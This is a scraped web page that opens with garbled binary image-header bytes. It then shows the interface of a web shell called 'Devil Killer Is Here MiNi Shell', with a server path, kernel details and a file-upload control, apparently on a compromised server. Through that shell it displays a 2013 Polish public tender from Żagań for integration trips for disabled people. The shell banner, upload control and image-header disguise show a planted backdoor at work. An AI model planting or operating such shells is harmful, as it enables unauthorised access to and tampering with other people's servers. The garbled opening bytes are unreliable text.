JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130422/158292-N-2013.html

<p class="kh_header"><b>Żagań: Usługi związane z organizacją integracyjnego wyjazdu osób niepełnosprawnych połączonego ze specjalistycznym poradnictwem w ramach realizacji projektu pod nazwą  Rozwój i upowszechnianie aktywnej integracji przez Powiatowe Centrum Pomocy Rodzinie w Żaganiu</b><br>
<b>Numer ogłoszenia: 158292 - 2013; data zamieszczenia: 22.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Śląska 1, 68-100 Żagań, woj. lubuskie, tel. 068 477 77 71-78, 95-97, faks 068 477 77 74.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Powiatowe Centrum Pomocy Rodzinie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi związane z organizacją integracyjnego wyjazdu osób niepełnosprawnych połączonego ze specjalistycznym poradnictwem w ramach realizacji projektu pod nazwą  Rozwój i upowszechnianie aktywnej integracji przez Powiatowe Centrum Pomocy Rodzinie w Żaganiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Organizacja wyjazdu integracyjnego osób niepełnosprawnych połączonego ze specjalistycznym poradnictwem w następującym zakresie:
GRUPA I
1. Termin realizacji zamówienia - czas trwania wyjazdu: 7dni (od soboty do piątku), termin:                    I połowa czerwca 2013r.
2. Liczba osób ogółem: 22 osoby, w tym:
- liczba osób niepełnosprawnych: 20 - (uczestnicy) - w tym: 10 osób głuchoniemych i niedosłyszących
- osoba koordynująca wyjazd - pracownik PCPR: 1
- tłumacz języka migowego  - 1 ( osoba z ramienia PCPR)
3. Istotne warunki zamówienia:
a) miejsce: miejscowość nadmorska położona w maksymalnej odległości od Żagania: 600km,
b) transport - z Żagania na miejsce pobytu i z powrotem,
c) wyżywienie przez cały okres pobytu:
- śniadanie: 132 sztuki ( 22 osoby x 6 dni),
- obiad: 154 sztuk ( 22 osoby x 7 dni),
- kolacja: 132 sztuki ( 22 osoby x 6 dni, w tym ognisko i grill),
- poczęstunek podczas przerw kawowych w trakcie trwania zajęć ze specjalistami: 10 przerw kawowych - z poczęstunkiem (kawa, herbata, woda, soki, ciastka, owoce).
Pierwszy dzień pobytu uczestników rozpocznie się obiadem, ostatni dzień pobytu zakończy się  obiadem. Dodatkowo uczestnicy otrzymają prowiant na drogę powrotną.
d) nocleg - 6 noclegów w minimum 3 gwiazdkowym hotelu, w pokojach max.                         3 osobowych oraz 1 pokój jednoosobowy dla pracownika koordynującego wyjazd i                 1 pokój dla tłumacza, pokoje z łazienkami, ze sprzętem RTV w hotelu                                  z przystosowaniem dla osób z trudnościami w poruszaniu się i na wózkach inwalidzkich
e) ubezpieczenie uczestników ( NW),
f) stała opieka pielęgniarska (ciągły dostęp grupy do świadczeń pielęgniarskich),
g) stała opieka lekarska (ciągły dostęp grupy do świadczeń lekarskich),
h) ćwiczenia usprawniające psychoruchowo (grupowe) - 1 h zegarowa dziennie przez 5 dni dla każdego uczestnika, prowadzone w sali przystosowanej do tego typu zajęć, wyposażonej w niezbędny sprzęt,
i) wspólne zajęcia ruchowe na plaży - nie mniej niż 0,5h zegarowej i nie więcej niż 1h zegarowa - codziennie ( od drugiego dnia pobytu),
j) zajęcia grupowe z psychologiem ( dla 10 osób niepełnosprawnych) - 10 h lekcyjnych, w tym pierwsze dwie godziny dotyczące zapoznania się uczestników - minimalny zakres tematyczny zajęć z psychologiem (z możliwością poszerzenia wg potrzeb grupy zaobserwowanych przez prowadzącego): bloki tematyczne to asertywność i autoprezentacja - nauka wyrażania własnych uczuć, egzekwowanie swoich praw oraz szanowanie praw innych, emocjonalne oraz społeczne konsekwencje postawy uległej, agresywnej i bierno-agresywnej, zabawy integracyjne umożliwiające samoocenę asertywności, mapa asertywności,
k) zajęcia grupowe z psychologiem (dla 10 osób głuchoniemych i niedosłyszących) - 10 h lekcyjnych, w tym pierwsze dwie godziny dotyczące zapoznania się uczestników - minimalny zakres tematyczny zajęć z psychologiem (z możliwością poszerzenia wg potrzeb grupy zaobserwowanych przez prowadzącego): bloki tematyczne to asertywność i autoprezentacja - nauka wyrażania własnych uczuć, egzekwowanie swoich praw oraz szanowanie praw innych, emocjonalne oraz społeczne konsekwencje postawy uległej, agresywnej i bierno-agresywnej, zabawy integracyjne umożliwiające samoocenę asertywności, mapa asertywności, - zajęcia prowadzone przy udziale tłumacza języka migowego ( z ramienia PCPR)
l) zajęcia indywidualne z psychologiem dla 10 osób ( z wyłączeniem osób głuchoniemych i niedosłyszących) z określeniem metryczki osobowościowej dla uczestników - nie mniej niż 1,5h zegarowej nie więcej niż 3h zegarowe na 1 osobę,
m) zajęcia integracyjne (np. wieczorek taneczny, ognisko, wycieczki piesze, zajęcia sportowe, konkursy itp.),
n) nauka tańca - dwa - zróżnicowane gatunkowo i pod względem dynamiki tańce towarzyskie - 6h
o) zapewnienie sali przystosowanej do prowadzenia zajęć grupowych na 21 osób, wraz z niezbędnymi materiałami (tablica, papier do pisania, rzutnik multimedialny itp.),
p) wskazanie osoby odpowiedzialnej za pobyt z ramienia wykonawcy ( organizatora) - osoba do stałej dyspozycji dla uczestników oraz pracownika PCPR.
GRUPA II
1. Termin realizacji zamówienia -czas trwania wyjazdu: 7dni (od soboty do piątku), termin: II połowa czerwca 2013r.
2. Liczba osób ogółem: 22 osoby w tym:
- liczba osób niepełnosprawnych: 20, - (uczestnicy)
- liczba osób będących OTOCZENIEM* - 1 osoba - (uczestnicy)
- osoba koordynująca wyjazd - pracownik PCPR: 1
3. Istotne warunki zamówienia: 
a) miejsce: miejscowość nadmorska położona w maksymalnej odległości od Żagania: 600km,
b) transport - z Żagania na miejsce pobytu i z powrotem,
c) wyżywienie przez cały okres pobytu:
- śniadanie: 132 sztuki ( 22 osoby x 6 dni),
- obiad: 154 sztuk ( 22 osoby x 7 dni),
- kolacja: 132 sztuki ( 22 osoby x 6 dni, w tym ognisko i grill),
- poczęstunek podczas przerw kawowych w trakcie trwania zajęć ze specjalistami:                5 przerw kawowych - z poczęstunkiem (kawa, herbata, woda, soki, ciastka, owoce).
Pierwszy dzień pobytu uczestników rozpocznie się obiadem, ostatni dzień pobytu zakończy się  obiadem. Dodatkowo uczestnicy otrzymają prowiant na drogę powrotną.
d) nocleg - 6 noclegów w minimum 3 gwiazdkowym hotelu, w pokojach max. 3 osobowych oraz 1 pokój jednoosobowy dla pracownika koordynującego wyjazd, pokoje z łazienkami, ze sprzętem RTV w hotelu z przystosowaniem dla osób z trudnościami w poruszaniu się i na wózkach inwalidzkich
e) ubezpieczenie uczestników ( NW),
f) stała opieka pielęgniarska (ciągły dostęp grupy do świadczeń pielęgniarskich),
g) stała opieka lekarska (ciągły dostęp grupy do świadczeń lekarskich),
h) ćwiczenia usprawniające psychoruchowo (grupowe) - 1 h zegarowa dziennie przez 5 dni dla każdego uczestnika, prowadzone w sali przystosowanej do tego typu zajęć, wyposażonej w niezbędny sprzęt,
i) wspólne zajęcia ruchowe na plaży - nie mniej niż 0,5h zegarowej i nie więcej niż 1h zegarowa - codziennie ( od drugiego dnia pobytu),
j) zajęcia grupowe z psychologiem - 10 h lekcyjnych, w tym pierwsze dwie godziny dotyczące zapoznania się uczestników - minimalny zakres tematyczny zajęć z psychologiem (z możliwością poszerzenia wg potrzeb grupy zaobserwowanych przez prowadzącego): bloki tematyczne to asertywność i autoprezentacja - nauka wyrażania własnych uczuć, egzekwowanie swoich praw oraz szanowanie praw innych, emocjonalne oraz społeczne konsekwencje postawy uległej, agresywnej i bierno-agresywnej, zabawy integracyjne umożliwiające samoocenę asertywności, mapa asertywności,
k) zajęcia indywidualne z psychologiem z określeniem metryczki osobowościowej dla uczestników - nie mniej niż 1,5h zegarowej nie więcej niż 3h zegarowe na 1 osobę,
l) zajęcia integracyjne (np. wieczorek taneczny, ognisko, wycieczki piesze, zajęcia sportowe, konkursy itp.),
m) nauka tańca - dwa - zróżnicowane gatunkowo i pod względem dynamiki tańce towarzyskie - 6h
n) zapewnienie sali przystosowanej do prowadzenia zajęć grupowych na 21 osób, wraz z niezbędnymi materiałami (tablica, papier do pisania, rzutnik multimedialny itp.),
o) wskazanie osoby odpowiedzialnej za pobyt z ramienia wykonawcy ( organizatora) - osoba do stałej dyspozycji dla uczestników oraz pracownika PCPR.
* OTOCZENIE - osoby, które w ramach wyjazdu zostaną objęte wsparciem w zakresie indywidualnych zajęć z psychologiem ( ilość godzin w zależności od potrzeb - nie mniej niż 2 godziny, nie więcej niż 5 godzin) ; dla tych osób należy również sporządzić dokumentację z odbytych zajęć z analizą efektów działań.
GRUPA III
1) Termin realizacji zamówienia -czas trwania wyjazdu: 7dni (od soboty do piątku), termin: I połowa września 2013r
2) Liczba osób ogółem: 22 osoby w tym:
- liczba osób niepełnosprawnych: 20, - (uczestnicy), w tym 1 osoba poruszająca się na wózku inwalidzkim
- liczba osób będących OTOCZENIEM* - 1 osoba - (uczestnicy)
- osoba koordynująca wyjazd - pracownik PCPR: 1
3) Istotne warunki zamówienia:
a) miejsce: miejscowość nadmorska położona w maksymalnej odległości od Żagania: 600km,
b) transport - z Żagania na miejsce pobytu i z powrotem,
c) wyżywienie przez cały okres pobytu:
- śniadanie: 132 sztuki ( 22 osoby x 6 dni),
- obiad: 154 sztuk ( 22 osoby x 7 dni),
- kolacja: 132 sztuki ( 22 osoby x 6 dni, w tym ognisko i grill),
- poczęstunek podczas przerw kawowych w trakcie trwania zajęć ze specjalistami: 5 przerw kawowych - z poczęstunkiem (kawa, herbata, woda, soki, ciastka, owoce).
Pierwszy dzień pobytu uczestników rozpocznie się obiadem, ostatni dzień pobytu zakończy się  obiadem. Dodatkowo uczestnicy otrzymają prowiant na drogę powrotną.
d) nocleg - 6 noclegów w minimum 3 gwiazdkowym hotelu, w pokojach max. 3 osobowych oraz 1 pokój jednoosobowy dla pracownika koordynującego wyjazd, pokoje z łazienkami, ze sprzętem RTV w hotelu z przystosowaniem dla osób z trudnościami w poruszaniu się i na wózkach inwalidzkich
e) ubezpieczenie uczestników ( NW),
f) stała opieka pielęgniarska (ciągły dostęp grupy do świadczeń pielęgniarskich),
g) stała opieka lekarska (ciągły dostęp grupy do świadczeń lekarskich),
h) ćwiczenia usprawniające psychoruchowo (grupowe) - 1 h zegarowa dziennie przez 5 dni dla każdego uczestnika, prowadzone w sali przystosowanej do tego typu zajęć, wyposażonej w niezbędny sprzęt,
i) wspólne zajęcia ruchowe na plaży - nie mniej niż 0,5h zegarowej i nie więcej niż 1h zegarowa - codziennie ( od drugiego dnia pobytu),
j) zajęcia grupowe z psychologiem - 10 h lekcyjnych, w tym pierwsze dwie godziny dotyczące zapoznania się uczestników - minimalny zakres tematyczny zajęć z psychologiem (z możliwością poszerzenia wg potrzeb grupy zaobserwowanych przez prowadzącego): bloki tematyczne to asertywność i autoprezentacja - nauka wyrażania własnych uczuć, egzekwowanie swoich praw oraz szanowanie praw innych, emocjonalne oraz społeczne konsekwencje postawy uległej, agresywnej i bierno-agresywnej, zabawy integracyjne umożliwiające samoocenę asertywności, mapa asertywności,
k) zajęcia indywidualne z psychologiem z określeniem metryczki osobowościowej dla uczestników - nie mniej niż 1,5h zegarowej nie więcej niż 3h zegarowe na 1 osobę,
l) zajęcia integracyjne (np. wieczorek taneczny, ognisko, wycieczki piesze, zajęcia sportowe, konkursy itp.),
m) nauka tańca - dwa - zróżnicowane gatunkowo i pod względem dynamiki tańce towarzyskie - 6h
n) zapewnienie sali przystosowanej do prowadzenia zajęć grupowych na 21 osób, wraz z niezbędnymi materiałami (tablica, papier do pisania, rzutnik multimedialny itp.),
o) wskazanie osoby odpowiedzialnej za pobyt z ramienia wykonawcy ( organizatora) - osoba do stałej dyspozycji dla uczestników oraz pracownika PCPR.
* OTOCZENIE - osoby, które w ramach wyjazdu zostaną objęte wsparciem w zakresie indywidualnych zajęć z psychologiem ( ilość godzin w zależności od potrzeb - nie mniej niż 2 godziny, nie więcej niż 5 godzin) ; dla tych osób należy również sporządzić dokumentację z odbytych zajęć z analizą efektów działań.
Grupa IV
1) Termin realizacji zamówienia -czas trwania wyjazdu: 7dni (od soboty do piątku), termin: II połowa września 2013r
2) Liczba osób ogółem: 22 osoby w tym:
- liczba osób niepełnosprawnych: 20, - (uczestnicy),
- liczba osób będących OTOCZENIEM* - 1 osoba - (uczestnicy)
- osoba koordynująca wyjazd - pracownik PCPR: 1
3) Istotne warunki zamówienia:
a) miejsce: miejscowość nadmorska położona w maksymalnej odległości od Żagania: 600km,
b) transport - z Żagania na miejsce pobytu i z powrotem,
c) wyżywienie przez cały okres pobytu:
- śniadanie: 132 sztuki ( 22 osoby x 6 dni),
- obiad: 154 sztuk ( 22 osoby x 7 dni),
- kolacja: 132 sztuki ( 22 osoby x 6 dni, w tym ognisko i grill),
- poczęstunek podczas przerw kawowych w trakcie trwania zajęć ze specjalistami: 5 przerw kawowych - z poczęstunkiem (kawa, herbata, woda, soki, ciastka, owoce).
Pierwszy dzień pobytu uczestników rozpocznie się obiadem, ostatni dzień pobytu zakończy się  obiadem. Dodatkowo uczestnicy otrzymają prowiant na drogę powrotną.
d) nocleg - 6 noclegów w minimum 3 gwiazdkowym hotelu, w pokojach max. 3 osobowych oraz 1 pokój jednoosobowy dla pracownika koordynującego wyjazd, pokoje z łazienkami, ze sprzętem RTV w hotelu z przystosowaniem dla osób z trudnościami w poruszaniu się i na wózkach inwalidzkich
e) ubezpieczenie uczestników ( NW),
f) stała opieka pielęgniarska (ciągły dostęp grupy do świadczeń pielęgniarskich),
g) stała opieka lekarska (ciągły dostęp grupy do świadczeń lekarskich),
h) ćwiczenia usprawniające psychoruchowo (grupowe) - 1 h zegarowa dziennie przez 5 dni dla każdego uczestnika, prowadzone w sali przystosowanej do tego typu zajęć, wyposażonej w niezbędny sprzęt,
i) wspólne zajęcia ruchowe na plaży - nie mniej niż 0,5h zegarowej i nie więcej niż 1h zegarowa - codziennie ( od drugiego dnia pobytu),
j) zajęcia grupowe z psychologiem - 10 h lekcyjnych, w tym pierwsze dwie godziny dotyczące zapoznania się uczestników - minimalny zakres tematyczny zajęć z psychologiem (z możliwością poszerzenia wg potrzeb grupy zaobserwowanych przez prowadzącego): bloki tematyczne to asertywność i autoprezentacja - nauka wyrażania własnych uczuć, egzekwowanie swoich praw oraz szanowanie praw innych, emocjonalne oraz społeczne konsekwencje postawy uległej, agresywnej i bierno-agresywnej, zabawy integracyjne umożliwiające samoocenę asertywności, mapa asertywności,
k) zajęcia indywidualne z psychologiem z określeniem metryczki osobowościowej dla uczestników - nie mniej niż 1,5h zegarowej nie więcej niż 3h zegarowe na 1 osobę,
l) zajęcia integracyjne (np. wieczorek taneczny, ognisko, wycieczki piesze, zajęcia sportowe, konkursy itp.),
m) nauka tańca - dwa - zróżnicowane gatunkowo i pod względem dynamiki tańce towarzyskie - 6h
n) zapewnienie sali przystosowanej do prowadzenia zajęć grupowych na 21 osób, wraz z niezbędnymi materiałami (tablica, papier do pisania, rzutnik multimedialny itp.),
o) wskazanie osoby odpowiedzialnej za pobyt z ramienia wykonawcy ( organizatora) - osoba do stałej dyspozycji dla uczestników oraz pracownika PCPR.
* OTOCZENIE - osoby, które w ramach wyjazdu zostaną objęte wsparciem w zakresie indywidualnych zajęć z psychologiem ( ilość godzin w zależności od potrzeb - nie mniej niż 2 godziny, nie więcej niż 5 godzin) ; dla tych osób należy również sporządzić dokumentację z odbytych zajęć z analizą efektów działań.
2. Ramowy harmonogram organizacyjny dla I grupy wyjazdowej przedstawia się następująco :
Dzień pierwszy :
Dzień pierwszy
5:45                                 zbiórka na placu k/ LIDLA w Żaganiu
6:00                                 wyjazd do ośrodka
12:00                               przyjazd, zakwaterowanie, zapoznanie się z kadra ośrodka
13:00 - 13:45                  obiad
14:00 - 18:00                  czas na relaks po podróży ( spacer po okolicy, plaża itp.)
18:00 -           grill, wieczorek zapoznawczy

Dzień drugi
6:30                                pobudka
7:00 - 7:45                     zajęcia ruchowe na plaży
8:00 - 8:30                     śniadanie
9:00 - 9:45                        grupowe zajęcia z psychologiem ( zajęcia zapoznawczo -     integracyjne) - dla  10 osób głuchoniemych i niedosłyszących
9:45 - 10:00                     przerwa
10:00 - 10:45                   grupowe zajęcia z psychologiem (zajęcia zapoznawczo -     integracyjne) - dla  10 osób głuchoniemych i niedosłyszących
10:45 - 11:30                 czas wolny
11:30 - 12:30                 ćwiczenia usprawniające psychoruchowo
13:00 - 13:45                 obiad
14:00 - 14:45                    grupowe zajęcia z psychologiem ( zajęcia zapoznawczo -     integracyjne) - dla pozostałych uczestników
14:45 - 15:00                  przerwa
15:00 - 15:45                    grupowe zajęcia z psychologiem ( zajęcia zapoznawczo -     integracyjne) - dla pozostałych uczestników              
17:00 - 19:00                 zajęcia taneczne ( nauka tańca)
19:00 - 19:45                 kolacja
20:00 -   wieczorek taneczny
W godzinach od 12:30 do 21:30 - indywidualne zajęcia z psychologiem     
Dzień trzeci
6:30                                pobudka
7:00 - 7:45                     zajęcia ruchowe na plaży
8:00 - 8:30                     śniadanie
9:00 - 9:45                     grupowe zajęcia z psychologiem dla pozostałych uczestników              
9:45 - 10:00                   przerwa
10:00 - 10:45                grupowe zajęcia z psychologiem dla pozostałych uczestników              
10:45 - 11:30                 czas wolny
11:30 - 12:30                 ćwiczenia usprawniające psychoruchowo
13:00 - 13:45                 obiad
14:00 - 14:45           grupowe zajęcia z psychologiem dla  10 osób głuchoniemych i niedosłyszących
14:45 - 15:00                  przerwa
15:00 - 15:45            grupowe zajęcia z psychologiem dla  10 osób głuchoniemych i niedosłyszących
16:00 - 19:00                 wycieczka piesza
19:00 - 19:45                 kolacja
Dzień czwarty
6:30                                pobudka
7:00 - 7:45                     zajęcia ruchowe na plaży
8:00 - 8:30                     śniadanie
9:00 - 9:45             grupowe zajęcia z psychologiem - dla  10 osób głuchoniemych i niedosłyszących
9:45 - 10:00                   przerwa
10:00 - 10:45           grupowe zajęcia z psychologiem - dla  10 osób głuchoniemych i niedosłyszących
10:45 - 11:30                 czas wolny
11:30 - 12:30                 ćwiczenia usprawniające psychoruchowo
13:00 - 13:45                 obiad
14:00 - 14:45                 grupowe zajęcia z psychologiem dla pozostałych uczestników              
14:45 - 15:00                  przerwa
15:00 - 15:45                  grupowe zajęcia z psychologiem dla pozostałych uczestników              
17:00 - 19:00                 zajęcia taneczne ( nauka tańca)
19:00 - 21:00                 kolacja - grill
W godzinach od 12:30 do 21:30 - indywidualne zajęcia z psychologiem.

Dzień piąty
pobudka
7:00 - 7:45                     zajęcia ruchowe na plaży
8:00 - 8:30                     śniadanie
9:00 - 9:45                     grupowe zajęcia z psychologiem dla pozostałych uczestników
9:45 - 10:00                   przerwa
10:00 - 10:45                 grupowe zajęcia z psychologiem dla pozostałych uczestników
10:45 - 11:30                 czas wolny
11:30 - 12:30                 ćwiczenia usprawniające psychoruchowo
13:00 - 13:45                 obiad
14:00 - 14:45           grupowe zajęcia z psychologiem dla  10 osób głuchoniemych i niedosłyszących              
14:45 - 15:00                  przerwa
15:00 - 15:45            grupowe zajęcia z psychologiem dla  10 osób głuchoniemych i niedosłyszących
16:00 - 19:00                 wycieczka piesza
19:00 - 19:45                 kolacja
W godzinach od 12:30 - 21:00 - indywidualne zajęcia z psychologiem.
Dzień szósty
6:30                                pobudka
7:00 - 7:45                     zajęcia ruchowe na plaży
8:00 - 8:30                     śniadanie
9:00 - 9:45                   grupowe zajęcia z psychologiem dla  10 osób głuchoniemych i niedosłyszących
9:45 - 10:00                   przerwa
10:00 - 10:45           grupowe zajęcia z psychologiem dla  10 osób głuchoniemych i niedosłyszących
10:45 - 11:30                 czas wolny
11:30 - 12:30                 ćwiczenia usprawniające psychoruchowo
13:00 - 13:45                 obiad
14:00 - 14:45                 grupowe zajęcia z psychologiem dla pozostałych uczestników              
14:45 - 15:00                 przerwa
15:00 - 15:45                 grupowe zajęcia z psychologiem dla pozostałych uczestników
17:00 - 19:00                 zajęcia taneczne ( nauka tańca)
19:00 - 19:45                 kolacja
20:00 -  wieczorek taneczny

W godzinach od 12:30 - 20:00 - zajęcia indywidualne z psychologiem
Dzień siódmy
6:30   pobudka
7:00 do 7:45  zajęcia ruchowe na plaży
8:00 do 8:30  śniadanie
9:00 do 10:00  spotkanie z kadrą ośrodka - podsumowanie wyjazdu
10:00 do 13:00  spacer po okolicy i plaży
13:00 do 13:45  obiad
14:00 do 15:00  przygotowanie do wyjazdu  ( zaprowiantowanie na wyjazd)
15:00              wyjazd powrót do Żagania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda, aby wykonawca wykazał się posiadaniem: 
a) Jednego psychologa z uprawnieniami, posiadającego minimum dwuletnie doświadczenie zawodowe w prowadzeniu poradnictwa psychologicznego, indywidualnego i zajęć grupowych,
b) Jednego instruktora rekreacji ruchowej, posiadającego dwuletnie doświadczenie w pracy zawodowej,
c) Jednego lekarza posiadającego minimum dwuletnie doświadczenie w pracy zawodowej (specjalizacja nie jest wymagana),
d) Jednej pielęgniarki posiadającej minimum dwuletnie doświadczenie w pracy zawodowej (specjalizacja nie jest wymagana),
e) Jednego instruktora nauki tańca towarzyskiego posiadającego minimum dwuletnie doświadczenie szkoleniowe w zakresie nauki tańca towarzyskiego.

Ocena spełniania w/w warunków zostanie dokonana na podstawie załączonych do oferty dokumentów i oświadczeń zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
